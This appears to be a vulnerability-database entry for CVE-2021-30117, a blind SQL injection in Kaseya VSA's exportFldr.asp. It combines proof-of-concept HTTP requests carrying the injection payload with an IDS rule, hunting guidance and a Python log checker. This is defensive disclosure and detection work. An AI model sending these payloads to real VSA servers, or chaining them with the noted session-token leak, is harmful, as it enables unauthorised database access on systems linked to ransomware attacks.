CVE-2021-30117
Published 2021-07-09

Priority: P2 · 71 · high · CVSS 3.1: 8.8 · AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS: 72.05% (99.4th percentile)
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.

Detailed description
---

Given the following request:

```
GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
```

where the sessionId cookie value has been obtained via CVE-2021-30116, the result should be a failure. Response:

```
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881

Whoops.
----SNIP----
```

However, when fldrId is set to `(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))`, the request is allowed. Request:

```
GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
```

Response:

```
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transp
```
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kaseya | vsa | < 9.5.6 | 9.5.6 |
Detection & IOCs (extracted from sources)

Snort/Suricata rule (sid:2065485):

```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)"; flow:established,to_server; http.uri; content:"/InstallTab/exportFldr.asp?"; fast_pattern; content:"fldrId|3d|"; pcre:"/^[^&]*?(?:(?:S(?:HOW\x20(?:C(?:UR(?:DAT|TIM)E|HARACTER\x20SET)|(?:VARI|T)ABLES)|ELECT\x20(?:FROM|USER|SLEEP))|U(?:NION\x20SELEC|PDATE\x20SE)T|DELETE\x20FROM|INSERT\x20INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\x2f\*.+\*\x2f)/Ri"; reference:url,csirt.divd.nl/cves/CVE-2021-30117/; reference:cve,2021-30117; classtype:web-application-attack; sid:2065485; rev:1; metadata:affected_product Kaseya_VSA, attack_target Server, tls_state TLSDecrypt, created_at 2025_10_27, cve CVE_2021_30117, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_10_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
```
- Exploitation is semi-authenticated: a valid sessionId cookie (obtainable via the CVE-2021-30116 credential leak) is required. Correlate detections of CVE-2021-30116 sessionId harvesting with subsequent requests to /InstallTab/exportFldr.asp.
- Monitor for SQL keywords (SELECT, UNION, CASE, WHEN, FROM, SLEEP, INSERT, DELETE, UPDATE), URL-encoded or plaintext, in the fldrId query parameter of requests to /InstallTab/exportFldr.asp.
- Agent GUIDs can be retrieved from the local registry of a compromised host running a VSA agent and used for authentication bypass via /dl.asp. Hunt for registry reads of the VSA agent GUID key on endpoints.
- The Snort/ET rule (sid:2065485) should be deployed at both perimeter and internal sensors with TLS inspection enabled (tls_state TLSDecrypt) to catch exploitation attempts over HTTPS.
- Exploitation requires a valid sessionId cookie, which must first be obtained via CVE-2021-30116 (credential leak / business logic flaw); this CVE alone is not exploitable without that prerequisite session token.
- Kaseya's SaaS VSA platform was stated not to be vulnerable to the exploited vulnerabilities; only on-premises VSA servers are affected.
- The ET Snort rule requires TLS decryption to be effective against HTTPS-protected VSA deployments.
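As an added example (not code from the original page or from any source it cites), a small Python checker that applies the monitoring advice above to constructed access-log lines: it isolates requests to /InstallTab/exportFldr.asp, URL-decodes the fldrId value so that percent-encoded and plaintext forms are treated alike, and flags SQL keywords. It also flags any non-numeric fldrId; that legitimate folder ids are numeric is an assumption, not something the advisory states.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not from the original page), simplified to
# "<client> <method> <uri> <status>". Line 3 carries the advisory's encoded payload.
SAMPLE_LOG = """\
10.0.0.5 GET /InstallTab/exportFldr.asp?fldrId=1 200
10.0.0.5 GET /InstallTab/exportFldr.asp?fldrId=1%27 500
10.0.0.7 GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 200
10.0.0.7 GET /InstallTab/exportFldr.asp?fldrId=5+UNION+SELECT+1,2 200
10.0.0.9 GET /other.asp?fldrId=SELECT+FROM 200
"""

TARGET_PATH = "/InstallTab/exportFldr.asp"

# Keyword checks in the spirit of the ET rule's PCRE. They run on the decoded
# value, so "%20", "+" and mixed case cannot hide the keywords.
SQL_KEYWORDS = re.compile(
    r"\b(?:UNION\s+SELECT|SELECT\s+(?:FROM|USER|SLEEP)|CASE\s+WHEN"
    r"|INSERT\s+INTO|DELETE\s+FROM|UPDATE\s+\S+\s+SET"
    r"|SHOW\s+(?:TABLES|VARIABLES|CURDATE|CURTIME))\b|/\*.*\*/",
    re.IGNORECASE | re.DOTALL,
)


def inspect_request(line):
    """Return a finding dict for one log line, or None if it is not suspicious."""
    fields = line.split()
    if len(fields) != 4:
        return None
    client, _method, uri, status = fields
    parts = urlsplit(uri)
    if parts.path != TARGET_PATH:
        return None
    # parse_qs percent-decodes and turns '+' into a space for us.
    values = parse_qs(parts.query, keep_blank_values=True).get("fldrId")
    if not values:
        return None
    fldr_id = values[0]
    reasons = []
    if SQL_KEYWORDS.search(fldr_id):
        reasons.append("sql-keywords")
    if not fldr_id.isdigit():  # assumption: legitimate folder ids are numeric
        reasons.append("non-numeric")
    if not reasons:
        return None
    return {"client": client, "status": status, "fldrId": fldr_id, "reasons": reasons}


def scan_log(text):
    # Run inspect_request over every line and keep only the findings.
    return [f for f in map(inspect_request, text.splitlines()) if f]
```

On the sample above, `scan_log(SAMPLE_LOG)` returns three findings: the bare quote (non-numeric only), the advisory's CASE/UNION payload, and the plaintext UNION SELECT; the benign `fldrId=1` and the request to another path are ignored.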
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
No advisories linked to this vulnerability.
Suricata
ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)
suricata · 2025-10-27 · CVSS 9.8 [CRITICAL]
Rule: see the Snort/Suricata rule (sid:2065485) under Detection & IOCs above.
No public exploits indexed.
Huntress
The Hunt to Find Origins of Kaseya's VSA Mass Ransomware Incident | Huntress
blogs_huntress · 2021-07-20
Kaseya has a customer base of roughly 35,000 businesses and organizations. These consist of approximately 17,000 managed service providers, 18,000 direct/VAR customers and a significant number of end users at the organizations they support. There is certainly a large attack surface offered to threat actors who might compromise the Kaseya VSA software.
In the recent ransomware incident that occurred in July 2021, the industry learned that 50-60 MSPs and their managed customers were encrypted by the REvil ransomware gang through the Kaseya VSA remote monitoring and management software.
With just 50-60 MSPs affected out of a potential 17,000 or 35,000, that leaves us with a large lingering question… “Why weren’t there more victims?”
That is to say, in a more pointed manner, “Shouldn’t the
Tenable
CVE-2021-30116: Multiple Zero-Day Vulnerabilities in Kaseya VSA Exploited to Distribute REvil Ransomware
blogs_tenable · 2021-07-06 · CVSS 10.0 [CRITICAL]
References:

- https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/
- https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021